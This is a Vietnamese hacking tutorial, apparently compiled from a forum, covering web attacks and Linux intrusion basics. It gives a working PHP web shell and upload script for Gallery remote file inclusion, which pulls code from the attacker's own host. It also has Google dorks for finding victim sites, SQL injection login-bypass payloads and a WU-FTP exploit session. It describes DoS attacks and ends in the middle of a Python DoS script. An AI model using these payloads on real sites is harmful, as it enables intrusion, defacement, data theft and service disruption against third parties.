"/admin hay /advadmin hay /hosting"

ta hãy đánh từ khoá :

allinurl:/advadmin

hoặc allinurl:/admin

hoặc allinurl:/hosting

Nó sẽ liệt kê ra các trang Web có URL dạng :

http://tentrangweb.com/advadmin

hoặc http://tentrangweb.com/admin

hoặc http://tentrangweb.com/hosting

VD với forum UBB có đoạn đặc trưng

"cgi-bin/ultimatebb.cgi?"

Ta cũng tìm tương tự như trên .

Chỉ cần bạn biết cách tìm như vậy rồi thì sau này chỉ cần theo dõi thông tin

cập nhật bên trang “Lỗi bảo mật” của HVA do bạn LeonHart post hằng ngày các

bạn sẽ hiểu được ý nghĩa của chúng và tự mình kiểm tra .

30 . ) Kỹ thuật hack Web thông qua lỗi Gallery ( một dạng của lỗi php code inject):

_ Gallery là một công cụ cho phép tạo một gallery ảnh trên web được viết bằng

PHP , lợi dụng sơ hở này ta có thể lợi dụng để viết thêm vào đó một mã

PHP cho phép ta upload , đó chính là mục đích chính của ta .

_ Trước hết bạn hãy đăng ký một host miễn phí , tốt nhất là bạn đăng ký

ở brinkster.com cho dễ . Sau đó bạn mở notepad và tạo file PHP với đoạn mã sau

:

CODE

<?php

global $PHP_SELF;

echo "<html><body>

<form method=post action=$PHP_SELF?$QUERY_STRING>

<input type=text name=shell size=40>

<input type=hidden name=act value=shell>

<input type=submit value=Go name=sm>

</form>";

set_magic_quotes_runtime(1);

if ($act == "shell") {

echo "

<xmp>";

system($shell);

echo "</xmp>

";}

echo "</body></html>";

?>

Đoạn mã này bạn hãy tạo làm 2 file có tên khác nhau ( nhưng cùng chung một mã )

và đặt tên là :

+ shellphp.php : file này dùng để chạy shell trên victim host .

+ init.php : file này dùng để upload lên trang có host bạn vừa tạo . ( Bạn hãy

upload file init.php này lên sớm vì ta sẽ còn sử dụng nó nhưng với đoạn mã

khác , bạn quên upload file này lên là tiêu )

Bạn hãy tạo thêm một file PHP với mã sau :

CODE

<?php

function handleupload() {

if (is_uploaded_file($_FILES['userfile']['tmp_name'])) {

$filename = $_FILES['userfile']['tmp_name'];

print "$filename was uploaded successfuly";

$realname = $_FILES['userfile']['name'];

print "realname is $realname

";

print "copying file to uploads dir ".$realname;

copy($_FILES['userfile']['tmp_name'],*PATH*.$realname); [B]// lưu ý *PATH* chúng ta sẽ thay

đổi sau[/B]

} else {

echo "Possible file upload attack: filename".$_FILES['userfile']['name'].".";

}

}

if ($act == "upload") {

handleupload();

}

echo "<html><body>

<form ENCTYPE=multipart/form-data method=post action=$PHP_SELF?$QUERY_STRING>

File:<INPUT TYPE=FILE NAME=userfile SIZE=35>

<input type=hidden name=MAX_FILE_SIZE value=1000000>

<input type=hidden name=act value=upload>

<input type=submit value=Upload name=sm>

</form>

</body></html>";

?>

Bạn hãy đặt tên là upload.php , nó sẽ dùng để upload lên trang Web của nạn

nhân .

_ Tiếp theo Bạn vào Google, gõ "Powered by gallery" rồi enter, Google sẽ liệt kê một

đống những site sử dụng Gallery , bạn hãy chọn lấy một trang bất kỳ rồI

dùng link sau để thử xem nó còn mắc lỗI Gallery hay không :

http://<tên trang Web của nạn

nhân>/gallery./captionator.php?GALLERY_BASEDIR=http://wwwxx.brinkster.com/<tên host bạn vừa

đăng ký>/

Nếu bạn thấy hiện lên một ô hình chữ nhật ở phía trên cùng , bên phải

của nó là ô lệnh chuyển tiếp có chữ “Go” là coi như bạn đã tìm thấy

được đốI tượng rồi đó . Bây giờ bạn đã có thể gõ lệnh thông qua ô

chữ nhật đó để hack Web của nạn nhân .

Trước hết bạn hãy gõ lệnh “pwd” để xác định đường dẫn tuyệt đối

đến thư mục hiện thời rồi nhấn nút “Go” , khi nó cho kết quả bạn hãy

nhanh chóng ghi lại đường dẫn ở phía dướI ( Tôi sẽ sử dụng VD đường dẫn

tôi tìm thấy là “/home/abc/xyz/gallery” ).

Sau đó bạn đánh tiếp lệnh “|s –a|” để liệt kê các thư mục con của nó .

Bây giờ bạn hãy nhìn kết quả , bạn sẽ thấy một đống các thư mục con mà

ta đã liệt kê . Bạn hãy luôn nhớ là mục đích của chúng ta là tìm một thư

mục có thể dùng để upload file upload.php mà ta đã chuẩn bị từ trước do đó

bạn hãy xác định cùng tôi bằng cách nhìn vào những chữ cuốI cùng của mỗi

hàng kết quả :

+ Bạn hãy loại bỏ trường hợp các thư mục mà có dấu “.” hoặc “..” vì

đây là thư mục gốc hoặc là thư mục ảo ( Nó thường được xếp trên cùng

của các hàng kết quả ) .

+ Bạn cũng loạI bỏ những hàng có chữ cuối cùng có gắn đuôi ( VD như

config.php , check.inc .v.v… ) vì đây là những file chứ không phải là thư mục .

+ Còn lại là những thư mục có thể upload nhưng tôi khuyên bạn nên chọn những

hàng chứa tên thư mục mà có chứa số lớn hơn 1 ( Bạn có thể xác định

được chúng bằng cách nhìn cột thứ 2 từ trái sang ) , vì như vậy vừa chắc

chắn đây là thư mục không phải thư mục ảo , vừa làm cho admin của trang Web

đó khó phát hiện khi ta cài file của ta vào . Tôi VD tôi phát hiện ra thư mục

“loveyou” có chứa 12 file có thể cho ta upload , như vậy đường dẫn chính thức

mà ta upload lên sẽ là :

/home/abc/xyz/Gallery/loveyou

Bây giờ bạn hãy vào account host của bạn, sửa nội dung file init.php giống như

mã của file upload.php, nhưng sửa lại *PATH* thành “/home/abc/xyz/gallery/loveyou/ ”.

Đồng thời cũng chuẩn bị một file upload.php trên máy của bạn với *PATH* là

“” ( 2 dấu ngoặc kép ).

Bây giờ là ta đã có thể upload file upload.php lên trang Web của nạn nhân được

rồi , bạn hãy nhập địa chỉ sau trên trình duyệt Web của bạn :

http://<tên trang Web của nạn

nhân>/gallery./captionator.php?GALLERY_BASEDIR=http://wwwxx.brinkster.com/<tên trang Host bạn

đã tạo từ đầu>/

Bạn sẽ thấy xuất hiện tiếp một khung hình chữ nhật và bên cạnh là có 2

nút lệnh , một là nút “brown” , một là nút “upload” . Nút “brown” bạn

dùng để dẫn đến địa chỉ file upload.php bạn đã chuẩn bị trên máy của

bạn , nút “upload” khi bạn nhấn vào đó thì nó sẽ upload file upload.php lên

trang Web của nạn nhân . Ok , bây giờ coi như bạn đã hoàn thành chặng đường

hack Web rồi đó . Từ bây giờ bạn hãy vận dụng để tấn công đối thủ như

lấy database , password ( làm tương tự như các bài hướng dẫn hack trước ) ,

nhưng các bạn chỉ nên thực tập chứ đừng xoá database hay phá Web của họ.

Nếu là một hacker chân chính các bạn chỉ cần upload lên trang Web dòng chữ :

“Hack by ……..” là đủ rồi .

Cũng như những lần trước , các bạn có thành công hay không cũng tuỳ thuộc vào

sự may mắn và kiên trì nghiên cứu vận dụng kiến thức của các bạn .

31 . ) Gói tin TCP/IP là gì?

TCP/IP viết tắt cho Transmission Control Protocol and Internet Protocol, một Gói tin TCP/IP

là một khối dữ liệu đã được nén, sau đó kèm thêm một header và gửi đến

một máy tính khác. Đây là cách thức truyền tin của internet, bằng cách gửi các

gói tin. Phần header trong một gói tin chứa địa chỉ IP của người gửi gói tin.

Bạn có thể viết lại một gói tin và làm cho nó trong giống như đến từ một

người khác!! Bạn có thể dùng cách này để tìm cách truy nhập vào rất nhiều

hệ thống mà không bị bắt. Bạn sẽ phải chạy trên Linux hoặc có một chương

trình cho phép bạn làm điều này.

32 . ) Linux là gi':

_Nói theo nghĩa gốc, Linux là nhân ( kernel ) của HĐH. Nhân là 1 phần mềm đảm

trách chức vụ liên lạc giữa các chương trình ứng dụng máy tính và phần

cứng. Cung cấp các chứng năng như: quản lý file, quản lý bộ nhớ ảo, các

thiết bị nhập xuất nhưng ổ cứng, màn hình, bàn phím, .... Nhưng Nhân Linux chưa

phải là 1 HĐH, vì thế nên Nhân Linux cần phải liên kết với những chương

trình ứng dụng được viết bởi tổ chức GNU tạo lên 1 HĐH hoàn chỉnh: HĐH

Linux. Đây cũng là lý do tại sao chúng ta thấy GNU/Linux khi được nhắc đến

Linux.

Tiếp theo, 1 công ty hay 1 tổ chức đứng ra đóng gói các sản phẩm này ( Nhân và

Chương trình ứng dụng ) sau đó sửa chữa một số cấu hình để mang đặc

trưng của công ty/ tổ chức mình và làm thêm phần cài đặt ( Installation Process )

cho bộ Linux đó, chúng ta có : Distribution. Các Distribution khác nhau ở số lượng

và loại Software được đóng gói cũng như quá trình cài đặt, và các phiên bản

của Nhân. 1 số Distribution lớn hiện nay của Linux là : Debian, Redhat, Mandrake,

SlackWare, Suse .

33 . ) Các lệnh căn bản cần biết khi sử dụng hoặc xâm nhập vào hệ thống

Linux :

_ Lệnh " man" : Khi bạn muốn biết cách sử dụng lệnh nào thì có thể dùng tới

lệnh nay :

Cấu trúc lệnh : $ man .

Ví dụ : $ man man

_ Lệnh " uname ": cho ta biết các thông tin cơ bản về hệ thống

Ví dụ : $uname -a ; nó sẽ đưa ra thông tin sau :

Linux gamma 2.4.18 #3 Wed Dec 26 10:50:09 ICT 2001 i686 unknown

_ Lệnh id : xem uid/gid hiện tại ( xem nhóm và tên hiện tại )

_ Lệnh w : xem các user đang login và action của họ trên hệ thống .

Ví Dụ : $w nó sẽ đưa ra thông tin sau :

10:31pm up 25 days, 4:07, 18 users, load average: 0.06, 0.01, 0.00

_ Lệnh ps: xem thông tin các process trên hệ thống

Ví dụ : $ps axuw

_ Lệnh cd : bạn muốn di chuyển đến thư mục nào . phải nhờ đến lệnh này .

Ví du : $ cd /usr/bin ----> nó sẽ đưa bạn đến thư mục bin

_ Lệnh mkdir : tạo 1 thư mục .

Ví dụ : $ mkdir /home/convit ---> nó sẽ tạo 1 thư mục convit trong /home

_ Lệnh rmdir : gỡ bỏ thư mục

Ví dụ : $ rmdir /home/conga ----> nó sẽ gỡ bỏ thư mục conga trong /home .

_ Lệnh ls: liệt kê nội dung thư mục

Ví dụ : $ls -laR /

_ Lệnh printf: in dữ liệu có định dạng, giống như sử dựng printf() của C++ .

Ví dụ : $printf %s "\x41\x41\x41\x41"

_ Lệnh pwd: đưa ra thư mục hiện hành

Ví dụ : $pwd ------> nó sẽ cho ta biết vị trí hiện thời của ta ở đâu :

/home/level1

_ Các lệnh : cp, mv, rm có nghĩa là : copy, move, delete file

Ví dụ với lệnh rm (del) : $rm -rf /var/tmp/blah ----->nó sẽ del file blah .

Làm tương tự đối với các lệnh cp , mv .

_ Lệnh find : tìm kiếm file, thư mục

Ví dụ : $find / -user level2

_ Lệnh grep: công cụ tìm kiếm, cách sử dụng đơn giản nhất : grep "something"

Vidu : $ps axuw | grep "level1"

_ Lệnh Strings: in ra tất cả các ký tự in được trong 1 file. Dùng nó để tìm

các khai báo hành chuỗi trong chương trình, hay các gọi hàm hệ thống, có khi tìm

thấy cả password nữa

VD: $strings /usr/bin/level1

_ Lệnh strace: (linux) trace các gọi hàm hệ thống và signal, cực kỳ hữu ích để

theo dõi flow của chương trình, cách nhanh nhất để xác định chương trình bị

lỗi ở đoạn nào. Trên các hệ thống unix khác, tool tương đương là truss, ktrace

.

Ví dụ : $strace /usr/bin/level1

_ Lệnh" cat, more ": in nội dung file ra màn hình

$cat /etc/passwd | more --> nó sẽ đưa ra nội dung file passwd một cách nhanh nhất .

$more /etc/passwd ----> Nó sẽ đưa ra nội dung file passwd một cách từ từ .

_ Lệnh hexdump : in ra các giá trị tương ứng theo ascii, hex, octal, decimal của dữ

liệu nhập vào .

Ví dụ : $echo AAAA | hexdump

_ Lệnh : cc, gcc, make, gdb: các công cụ biên dịch và debug .

Ví dụ : $gcc -o -g bof bof.c

Ví dụ : $make bof

Ví dụ : $gdb level1

(gdb) break main

(gdb) run

_ Lệnh perl: một ngôn ngữ

Ví dụ : $perl -e 'print "A"x1024' | ./bufferoverflow ( Lỗi tràn bộ đệm khi ta đánh

vào 1024 kí tự )

_ Lệnh "bash" : đã đến lúc tự động hoá các tác vụ của bạn bằng shell

script, cực mạnh và linh hoạt .

Bạn muốn tìm hiểu về bash , xem nó như thế nào :

$man bash

_ Lệnh ls : Xem nội dung thư mục ( Liệt kê file trong thư mục ) .

Ví Dụ : $ ls /home ----> sẽ hiện toàn bộ file trong thư mục Home

$ ls -a -----> hiện toàn bộ file , bao gồm cả file ẩn

$ ls -l -----> đưa ra thông tin về các file

_ Lệnh ghi dữ liệu đầu ra vào 1 file :

Vídụ : $ ls /urs/bin > ~/convoi ------> ghi dữ liệu hiển thị thông tin của thư mục

bin vào 1 file convoi .

34 . ) Những hiểu biết cơ bản xung quanh Linux :

a . ) Một vài thư mục quan trọng trên server :

_ /home : nơi lưu giữ các file người sử dụng ( VD : người đăng nhập hệ thống

có tên là convit thì sẽ có 1 thư mục là /home/convit )

_ /bin : Nơi xử lý các lệnh Unix cơ bản cần thiết như ls chẳng hạn .

_ /usr/bin : Nơi xử lý các lệnh dặc biệt khác , các lệnh dùng bởi người sử

dụng đặc biệt và dùng quản trị hệ thống .

_ /bot : Nơi mà kernel và các file khác được dùng khi khởi động .

_ /ect : Các file hoạt động phụ mạng , NFS (Network File System ) Thư tín ( Đây là

nơi trọng yếu mà chúng ta cần khai thác nhiều nhất )

_ /var : Các file quản trị

_ /usr/lib : Các thư viện chuẩn như libc.a

_ /usr/src : Vị trí nguồn của các chương trình .

b . ) Vị trí file chứa passwd của một số phiên bản khác nhau :

CODE

AIX 3 /etc/security/passwd !/tcb/auth/files//

A/UX 3.0s /tcb/files/auth/?/*

BSD4.3-Ren /etc/master.passwd *

ConvexOS 10 /etc/shadpw *

ConvexOS 11 /etc/shadow *

DG/UX /etc/tcb/aa/user/ *

EP/IX /etc/shadow x

HP-UX /.secure/etc/passwd *

IRIX 5 /etc/shadow x

Linux 1.1 /etc/shadow *

OSF/1 /etc/passwd[.dir|.pag] *

SCO Unix #.2.x /tcb/auth/files//

SunOS4.1+c2 /etc/security/passwd.adjunct ##username

SunOS 5.0 /etc/shadow

System V Release 4.0 /etc/shadow x

System V Release 4.2 /etc/security/* database

Ultrix 4 /etc/auth[.dir|.pag] *

UNICOS /etc/udb *

35 . ) Khai thác lỗi của Linux qua lỗ hổng bảo mật của WU-FTP server :

_ WU-FTP Server (được phát triển bởi đại Học Washington ) là một phần mềm

Server phục vụ FTP được dùng khá phổ biến trên các hệ thống Unix & Linux (

tất cả các nhà phân phối: Redhat, Caldera, Slackware, Suse, Mandrake....) và cả

Windows.... , các hacker có thể thực thi các câu lệnh của mình từ xa thông qua file

globbing bằng cách ghi đè lên file có trên hệ thống .

_ Tuy nhiên , việc khai thác lỗi này không phảI là dễ vì nó phải hội đủ

những điều kiện sau :

+ Phải có account trên server .

+ Phải đặt được Shellcode vào trong bộ nhớ Process của Server .

+ Phải gửi một lệnh FTP đặc biệt chứa đựng một globbing mẫu đặc biệt mà

không bị server phát hiện có lỗi .

+ Hacker sẽ ghi đè lên một Function, Code tới một Shellcode, có thể nó sẽ được

thực thi bới chính Server FTP .

_ Ta hãy phân tích VD sau về việc ghi đè lên file của server FTP :

CODE

ftp> open localhost <== lệnh mở trang bị lỗi .

Connected to localhost (127.0.0.1).

220 sasha FTP server (Version wu-2.6.1-18) ready <== xâm nhập thành công FTP server .

Name (localhost:root): anonymous <== Nhập tên chỗ này

331 Guest login ok, send your complete e-mail address as password.

Password:………..<== nhập mật khẩu ở đây

230 Guest login ok, access restrictions apply.

Remote system type is UNIX.

Using binary mode to transfer files. <== sử dụng biến nhị phân để chuyển đổi file

.

ftp> ls ~{ <== lệnh liệt kê thư mục hiện hành .

227 Entering Passive Mode (127,0,0,1,241,205)

421 Service not available, remote server has closed connection

1405 ? S 0:00 ftpd: accepting connections on port 21 ç chấp nhận kết nốI ở cổng 21

.

7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd

26256 ? S 0:00 ftpd:

sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

26265 tty3 R 0:00 bash -c ps ax | grep ftpd

(gdb) at 26256

Attaching to program: /usr/sbin/wu.ftpd, process 26256 <== khai thác lỗi Wu.ftpd .

Symbols already loaded for /lib/libcrypt.so.1

Symbols already loaded for /lib/libnsl.so.1

Symbols already loaded for /lib/libresolv.so.2

Symbols already loaded for /lib/libpam.so.0

Symbols already loaded for /lib/libdl.so.2

Symbols already loaded for /lib/i686/libc.so.6

Symbols already loaded for /lib/ld-linux.so.2

Symbols already loaded for /lib/libnss_files.so.2

Symbols already loaded for /lib/libnss_nisplus.so.2

Symbols already loaded for /lib/libnss_nis.so.2

0x40165544 in __libc_read () from /lib/i686/libc.so.6

(gdb) c

Continuing.

Program received signal SIGSEGV, Segmentation fault.

__libc_free (mem=0x61616161) at malloc.c:3136

3136 in malloc.c

Việc khai thác qua lỗi này đến nay tôi test vẫn chưa thành công ( chẳng biết

làm sai chỗ nào ) . Vậy bạn nào làm được hãy post lên cho anh em biết nhé .

Lỗi Linux hiện nay rất ít ( đặc biệt là đối với Redhat ), các bạn hãy chờ

đợi nếu có lỗi gì mới thì bên “LỗI bảo mật” sẽ cập nhật ngay . Khai

thác chúng như thế nào thì hỏi Mod quản lý bên đó , đặc biệt là bạn Leonhart

, cậu ta siêng trả lời các bạn lắm .

( Dựa theo bài viết của huynh Binhnx2000 )

36 . ) Tìm hiểu về SQL Injection :

_ SQL Injection là một trong những kiểu hack web đang dần trở nên phổ biến hiện

nay. Bằng cách inject các mã SQL query/command vào input trước khi chuyển cho ứng

dụng web xử lí, bạn có thể login mà không cần username và password, thi hành lệnh

từ xa, đoạt dữ liệu và lấy root của SQL server. Công cụ dùng để tấn công

là một trình duyệt web bất kì, chẳng hạn như Internet Explorer, Netscape, Lynx,

...

_ Bạn có thể kiếm được trang Web bị lỗi bằng cách dùng các công cụ tìm

kiếm để kiếm các trang cho phép submit dữ liệu . Một số trang Web chuyển tham

số qua các khu vực ẩn nên bạn phảI viewsource mớI thấy được . VD ta xác

định được trang này sử dụng Submit dữ liệu nhờ nhìn vào mã mà ta đã

viewsource :

CODE

<FORM action=Search/search.asp method=post>

<input type=hidden name=A value=C>

</FORM>

_ Kiểm tra thử xem trang Web có bị lỗi này hay không bằng cách nhập vào login và

pass lân lượt như sau :

- Login: hi' or 1=1--

- Pass: hi' or 1=1--

Nếu không được bạn thử tiếp với các login và pass sau :

CODE

' or 1=1--

" or 1=1--

or 1=1--

' or 'a'='a

" or "a"="a

') or ('a'='a

Nếu thành công, bạn có thể login vào mà không cần phải biết username và password

.

Lỗi này có dính dáng đến Query nên nếu bạn nào đã từng học qua cơ sở dữ

liệu có thể khai thác dễ dàng chỉ bằng cách đánh các lệnh Query trên trình

duyệt của các bạn . Nếu các bạn muốn tìm hiểu kỹ càng hơn về lỗi này có

thể tìm các bài viết của nhóm vicky để tìm hiểu thêm .

37 . ) Một VD về hack Web thông qua lỗi admentor ( Một dạng của lỗi SQL Injection )

:

_ Trước tiên bạn vào google.com tìm trang Web admentor bằng từ khoá “allinurl :

admentor” .

_ Thông thường bạn sẽ có kết quả sau :

http://www.someserver.com/admentor/admin/admin.asp

_ Bạn thử nhập “ ' or ''=' ” vào login và password :

CODE

Login : ' or ''='

Password : ' or ''='

_ Nếu thành công bạn sẽ xâm nhập vào Web bị lỗi với vai trò là admin .

_ Ta hãy tìm hiểu về cách fix lỗi này nhé :

+ Lọc các ký tự đặc biệt như “ ' " ~ \ ” bằng cách chêm vào javascrip đoạn

mã sau :

CODE

function RemoveBad(strTemp)

{

strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|

\-/g,"");

return strTemp;

}

+ Và gọi nó từ bên trong của asp script :

CODE

var login = var TempStr = RemoveBad

(Request.QueryString("login"));

var password = var TempStr = RemoveBad

(Request.QueryString("password"));

_ Vậy là ta đã fix xong lỗi .

_ Các bạn có thể áp dụng cách hack này cho các trang Web khác có submit dữ liệu ,

các bạn hãy test thử xem đi , các trang Web ở Việt Nam mình bị nhiều lắm , tôi

đã kiếm được kha khá pass admin bằng cách thử này rồi ( nhưng cũng đã báo

để họ fix lại ) .

_ Có nhiều trang khi login không phải bằng “ ' or ''=’ ” mà bằng các nick name

có thật đã đăng ký trên trang Web đó , ta vào link “thành viên” kiếm nick của

một admin để test thử nhé .

38 . ) DoS attack là gì ? ( Denial Of Services Attack )

_ DoS attack ( dịch là tấn công từ chối dịch vụ ) là kiểu tấn công rất lợi

hại , với loại tấn công này , bạn chỉ cần một máy tính kết nối Internet là

đã có thể thực hiện việc tấn công được máy tính của đốI phương . thực

chất của DoS attack là hacker sẽ chiếm dụng một lượng lớn tài nguyên trên

server ( tài nguyên đó có thể là băng thông, bộ nhớ, cpu, đĩa cứng, ... ) làm

cho server không thể nào đáp ứng các yêu cầu từ các máy của nguời khác ( máy

của những người dùng bình thường ) và server có thể nhanh chóng bị ngừng

hoạt động, crash hoặc reboot .

39 . ) Các loại DoS attack hiện đang được biết đến và sử dụng :

a . ) Winnuke :

_DoS attack loại này chỉ có thể áp dụng cho các máy tính đang chạy Windows9x .

Hacker sẽ gởi các gói tin với dữ liệu "Out of Band" đến cổng 139 của máy tính

đích.( Cổng 139 chính là cổng NetBIOS, cổng này chỉ chấp nhận các gói tin có

cờ Out of Band được bật ) . Khi máy tính của victim nhận được gói tin này,

một màn hình xanh báo lỗi sẽ được hiển thị lên với nạn nhân do chương

trình của Windows nhận được các gói tin này nhưng nó lại không biết phản ứng

với các dữ liệu Out Of Band như thế nào dẫn đến hệ thống sẽ bị crash .

b . ) Ping of Death :

_ Ở kiểu DoS attack này , ta chỉ cần gửi một gói dữ liệu có kích thước lớn

thông qua lệnh ping đến máy đích thì hệ thống của họ sẽ bị treo .

_ VD : ping –l 65000

c . ) Teardrop :

_ Như ta đã biết , tất cả các dữ liệu chuyển đi trên mạng từ hệ thống

nguồn đến hệ thống đích đều phải trải qua 2 quá trình : dữ liệu sẽ

được chia ra thành các mảnh nhỏ ở hệ thống nguồn, mỗi mảnh đều phải có

một giá trị offset nhất định để xác định vị trí của mảnh đó trong gói

dữ liệu được chuyển đi. Khi các mảnh này đến hệ thống đích, hệ thống

đích sẽ dựa vào giá trị offset để sắp xếp các mảnh lại với nhau theo thứ

tự đúng như ban đầu . Lợi dụng sơ hở đó , ta chỉ cần gởi đến hệ thống

đích một loạt gói packets với giá trị offset chồng chéo lên nhau. Hệ thống

đích sẽ không thể nào sắp xếp lại các packets này, nó không điều khiển

được và có thể bị crash, reboot hoặc ngừng hoạt động nếu số lượng gói

packets với giá trị offset chồng chéo lên nhau quá lớn !

d . ) SYN Attack :

_ Trong SYN Attack, hacker sẽ gởi đến hệ thống đích một loạt SYN packets với

địa chỉ ip nguồn không có thực. Hệ thống đích khi nhận được các SYN packets

này sẽ gởi trở lại các địa chỉ không có thực đó và chờ đợI để nhận

thông tin phản hồi từ các địa chỉ ip giả . Vì đây là các địa chỉ ip không

có thực, nên hệ thống đích sẽ sẽ chờ đợi vô ích và còn đưa các "request"

chờ đợi này vào bộ nhớ , gây lãng phí một lượng đáng kể bộ nhớ trên

máy chủ mà đúng ra là phải dùng vào việc khác thay cho phải chờ đợi thông tin

phản hồi không có thực này . Nếu ta gởi cùng một lúc nhiều gói tin có địa

chỉ IP giả như vậy thì hệ thống sẽ bị quá tải dẫn đến bị crash hoặc

boot máy tính . == > ném đá dấu tay .

e . ) Land Attack :

_ Land Attack cũng gần giống như SYN Attack, nhưng thay vì dùng các địa chỉ ip

không có thực, hacker sẽ dùng chính địa chỉ ip của hệ thống nạn nhân. Điều

này sẽ tạo nên một vòng lặp vô tận giữa trong chính hệ thống nạn nhân đó,

giữa một bên cần nhận thông tin phản hồi còn một bên thì chẳng bao giờ gởi

thông tin phản hồi đó đi cả . == > Gậy ông đập lưng ông .

f . ) Smurf Attack :

_Trong Smurf Attack, cần có ba thành phần: hacker (người ra lệnh tấn công), mạng

khuếch đại (sẽ nghe lệnh của hacker) và hệ thống của nạn nhân. Hacker sẽ

gởi các gói tin ICMP đến địa chỉ broadcast của mạng khuếch đại. Điều đặc

biệt là các gói tin ICMP packets này có địa chỉ ip nguồn chính là địa chỉ ip

của nạn nhân . Khi các packets đó đến được địa chỉ broadcast của mạng

khuếch đại, các máy tính trong mạng khuếch đại sẽ tưởng rằng máy tính nạn

nhân đã gởi gói tin ICMP packets đến và chúng sẽ đồng loạt gởi trả lại hệ

thống nạn nhân các gói tin phản hồi ICMP packets. Hệ thống máy nạn nhân sẽ

không chịu nổi một khối lượng khổng lồ các gói tin này và nhanh chóng bị

ngừng hoạt động, crash hoặc reboot. Như vậy, chỉ cần gởi một lượng nhỏ

các gói tin ICMP packets đi thì hệ thống mạng khuếch đại sẽ khuếch đại

lượng gói tin ICMP packets này lên gấp bộI . Tỉ lệ khuếch đại phụ thuộc vào

số mạng tính có trong mạng khuếch đạI . Nhiệm vụ của các hacker là cố

chiếm được càng nhiều hệ thống mạng hoặc routers cho phép chuyển trực tiếp

các gói tin đến địa chỉ broadcast không qua chỗ lọc địa chỉ nguồn ở các

đầu ra của gói tin . Có được các hệ thống này, hacker sẽ dễ dàng tiến hành

Smurf Attack trên các hệ thống cần tấn công . == > một máy làm chẳng si nhê ,

chục máy chụm lại ta đành chào thua .

g . ) UDP Flooding :

_ Cách tấn công UDP đòi hỏi phải có 2 hệ thống máy cùng tham gia. Hackers sẽ

làm cho hệ thống của mình đi vào một vòng lặp trao đổi các dữ liệu qua giao

thức UDP. Và giả mạo địa chỉ ip của các gói tin là địa chỉ loopback (

127.0.0.1 ) , rồi gởi gói tin này đến hệ thống của nạn nhân trên cổng UDP echo

( 7 ). Hệ thống của nạn nhân sẽ trả lời lại các messages do 127.0.0.1( chính nó

) gởi đến , kết quả là nó sẽ đi vòng một vòng lặp vô tận. Tuy nhiên, có

nhiều hệ thống không cho dùng địa chỉ loopback nên hacker sẽ giả mạo một

địa chỉ ip của một máy tính nào đó trên mạng nạn nhân và tiến hành ngập

lụt UDP trên hệ thống của nạn nhân . Nếu bạn làm cách này không thành công

thì chính máy của bạn sẽ bị đấy .

h . ) Tấn công DNS :

_ Hacker có thể đổi một lối vào trên Domain Name Server của hệ thống nạn nhân

rồi cho chỉ đến một website nào đó của hacker. Khi máy khách yêu cầu DNS phân

tích địa chỉ bị xâm nhập thành địa chỉ ip, lập tức DNS ( đã bị hacker thay

đổi cache tạm thờI ) sẽ đổi thành địa chỉ ip mà hacker đã cho chỉ đến

đó . Kết quả là thay vì phải vào trang Web muốn vào thì các nạn nhân sẽ vào

trang Web do chính hacker tạo ra . Một cách tấn công từ chối dịch vụ thật hữu

hiệu !.

g . ) Distributed DoS Attacks ( DDos ) :

_ DDoS yêu cầu phải có ít nhất vài hackers cùng tham gia. Đầu tiên các hackers sẽ

cố thâm nhập vào các mạng máy tính được bảo mật kém, sau đó cài lên các

hệ thống này chương trình DDoS server. Bây giờ các hackers sẽ hẹn nhau đến

thời gian đã định sẽ dùng DDoS client kết nối đến các DDoS servers, sau đó

đồng loạt ra lệnh cho các DDoS servers này tiến hành tấn công DDoS đến hệ

thống nạn nhân .

h . ) DRDoS ( The Distributed Reflection Denial of Service Attack ) :

_ Đây có lẽ là kiểu tấn công lợi hại nhất và làm boot máy tính của đối

phương nhanh gọn nhất . Cách làm thì cũng tương tự như DDos nhưng thay vì tấn

công bằng nhiều máy tính thì ngườI tấn công chỉ cần dùng một máy tấn công

thông qua các server lớn trên thế giới . Vẫn với phương pháp giả mạo địa

chỉ IP của victim , kẻ tấn công sẽ gởi các gói tin đến các server mạnh nhất

, nhanh nhất và có đường truyền rộng nhất như Yahoo .v.v… , các server này sẽ

phản hồi các gói tin đó đến địa chỉ của victim . Việc cùng một lúc nhận

được nhiều gói tin thông qua các server lớn này sẽ nhanh chóng làm nghẽn

đường truyền của máy tính nạn nhân và làm crash , reboot máy tính đó . Cách

tấn công này lợi hại ở chỗ chỉ cần một máy có kết nối Internet đơn giản

với đường truyền bình thường cũng có thể đánh bật được hệ thống có

đường truyền tốt nhất thế giớI nếu như ta không kịp ngăn chặn . Trang Web

HVA của chúng ta cũng bị DoS vừa rồi bởi cách tấn công này đấy .

40 . ) Kỹ thuật DoS Web bằng Python :

_ Kỹ thuật này chỉ có thể sử dụng duy nhất trên WinNT , và bạn cần phải có

thời gian thì máy tính của nạn nhân mới bị down được .

_ Bạn hãy download Pyphon tại http://www.python.org/ để sử dụng .

_ Bạn hãy save đoạn mã sau lên file rfpoison.py .

CODE

import struct

from socket import *

import sys

def a2b(s):

bytes = map(lambda x: string.atoi(x, 16),

string.split(s))

data = string.join(map(chr, bytes), '')

return data

def b2a(s):

bytes = map(lambda x: '%.2x' % x, map(ord, s))

return string.join(bytes, ' ')

# Yêu cầu tập hợp NBSS

nbss_session = a2b("""

81 00 00 48 20 43 4b 46 44 45

4e 45 43 46 44 45 46 46 43 46 47 45 46 46 43 43

41 43 41 43 41 43 41 43 41 43 41 00 20 45 48 45

42 46 45 45 46 45 4c 45 46 45 46 46 41 45 46 46

43 43 41 43 41 43 41 43 41 43 41 41 41 00 00 00

00 00

""")

# Tạo SMB

crud = (

# Yêu cầu SMBnegprot

"""

ff 53 4d 42 72 00

00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 f4 01 00 00 01 00 00 81 00 02 50 43

20 4e 45 54 57 4f 52 4b 20 50 52 4f 47 52 41 4d

20 31 2e 30 00 02 4d 49 43 52 4f 53 4f 46 54 20

4e 45 54 57 4f 52 4b 53 20 31 2e 30 33 00 02 4d

49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 4b

53 20 33 2e 30 00 02 4c 41 4e 4d 41 4e 31 2e 30

00 02 4c 4d 31 2e 32 58 30 30 32 00 02 53 61 6d

62 61 00 02 4e 54 20 4c 41 4e 4d 41 4e 20 31 2e

30 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00

""",

# Yêu cầu setup SMB X

"""

ff 53 4d 42 73 00

00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00

